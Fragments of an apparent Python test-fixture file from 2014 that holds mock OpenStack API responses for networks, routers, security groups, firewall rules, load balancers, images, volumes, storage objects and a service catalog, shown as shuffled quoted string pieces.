"\"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False }",
"{u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name':",
"\"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\"",
"\"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\",",
"FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"[ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'},",
"PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = {",
"} ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\",",
"\"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" },",
"\"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = {",
"'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain',",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\":",
"\"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\":",
"u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a',",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\":",
"\"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = {",
"\"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\",",
"\"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\":",
"True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
"\"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\",",
"IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints':",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\",",
"BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"\"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\",",
"u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten',",
"label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\":",
"'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service',",
"\"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID,",
"\"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None",
"\"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"],",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\":",
"\"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [",
"[{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration",
"\"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False },",
"SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\":",
"None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS =",
"}, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\":",
"\"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None,",
"u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable',",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"\"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS",
"\"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\":",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {},",
"\"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\",",
"\"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\":",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\",",
"\"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\":",
"\"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\":",
"= { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False,",
"FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\":",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [",
"], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status':",
"True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\":",
"\"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"{ \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS",
"encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed under",
"}, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\":",
"False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\",",
"} ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports':",
"distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY",
"\"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\":",
"} ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True,",
"\"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\":",
"{u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ {",
"], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\":",
"\"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True,",
"u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST =",
"\"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\":",
"\"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\":",
"\"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\",",
"True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = {",
"\"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True,",
"\"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\",",
"\"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] }",
"} ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\":",
"\"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\"",
"\"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\",",
"} STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten',",
"\"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\":",
"\"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None,",
"u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] }",
"\"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1],",
"}, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] }",
"'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": {",
"= 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE =",
"applicable law or agreed to in writing, software # distributed under the License",
"\"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': {",
"{ \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\":",
"2014 Cloudwatt # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\":",
"] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\":",
"\"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"-*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed",
"\"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\":",
"\"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1],",
"STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store'",
"\"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\":",
"{ \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, {",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID",
"\"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\":",
"\"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0],",
"JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints':",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"\"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\":",
"2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST",
"u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name':",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\":",
"\"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID },",
"{ \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\":",
"Cloudwatt # # Licensed under the Apache License, Version 2.0 (the \"License\"); you",
"{u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS =",
"'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' }",
"} ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ {",
"\"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\":",
"[ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\",",
"= [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = {",
"\"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [],",
"\"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"{ \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\":",
"'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, {",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" }",
"[ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\":",
"\"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"{ u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'},",
"\"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\",",
"\"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4,",
"\"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\":",
"False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
"PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, {",
"None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1]",
"\"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [",
"False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [",
"{ \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID,",
"FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\":",
"\"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\":",
"\"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [",
"\"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\":",
"\"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\",",
"\"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False",
"[ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] }",
"\"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" },",
"] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
"}, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\":",
"}, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\":",
